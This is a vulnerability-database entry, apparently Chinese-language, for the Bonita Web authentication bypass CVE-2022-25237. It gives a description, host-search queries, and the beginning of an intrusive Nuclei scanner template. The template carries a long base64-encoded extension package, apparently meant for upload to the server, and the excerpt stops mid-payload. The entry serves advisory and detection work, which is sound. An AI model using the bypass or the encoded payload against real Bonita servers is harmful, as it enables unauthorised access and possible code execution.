Bonita Web Authentication/Authorization Bypass Vulnerability

漏洞信息

漏洞名称: Bonita Web Authentication/Authorization Bypass Vulnerability

漏洞编号:

  • CVE: CVE-2022-25237

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: Bonita Web是一个广泛使用的业务流程管理(BPM)和工作流解决方案,旨在帮助企业设计、部署和管理业务流程自动化。它通常部署在企业环境中,用于优化和自动化复杂的业务流程。2021.2版本的Bonita Web存在一个认证/授权绕过漏洞,该漏洞源于RestAPIAuthorizationFilter中的排除模式过于宽泛,允许未经认证的用户通过向URL追加;i18ntranslation或/../i18ntranslation/来访问特权API端点。这一漏洞的技术根源在于不恰当的输入验证和访问控制缺失,使得攻击者能够绕过正常的认证流程。成功利用此漏洞的攻击者可以访问特权API端点,并可能上传文件到服务器,从而可能导致远程代码执行、数据泄露或其他恶意操作。此漏洞的利用不需要认证,可以自动化执行,因此对受影响系统的安全构成了严重威胁。

产品厂商: bonitasoft

产品名称: Bonita Web

影响版本: 2021.2

搜索语法: http.title:”Bonita” || “Server: Bonita”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/41de55890c76122b9378ebcdd8821c88cae6d614/http%2Fcves%2F2022%2FCVE-2022-25237.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111

id: CVE-2022-25237

info:
  name: Bonita Web 2021.2 - Authentication/Authorization Bypass
  author: Sourabh-Sahu
  severity: critical
  description: |
    Bonita Web 2021.2 contains an authentication/authorization bypass vulnerability caused by an overly broad exclude pattern in RestAPIAuthorizationFilter, allowing unauthenticated users to access privileged API endpoints by appending ;i18ntranslation or /../i18ntranslation/ to the URL.
  impact: |
    Successful exploitation allows unauthenticated attackers to access privileged API endpoints and potentially upload files to the server.
  remediation: |
    Update Bonita Web to the latest version that addresses this vulnerability or implement proper access controls to restrict unauthorized API access.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25237
    - https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/
    - https://bonitasoft.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25237
    cwe-id: CWE-285
    cpe: cpe:2.3:a:bonitasoft:bonita:2021.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: bonitasoft
    product: bonita
    shodan-query: 'http.title:"Bonita" || "Server: Bonita"'
    fofa-query: 'title="Bonita" || header="Server: Bonita"'
  tags: cve,cve2022,bonita,auth-bypass,intrusive

variables:
  zipdata: "{{base64_decode('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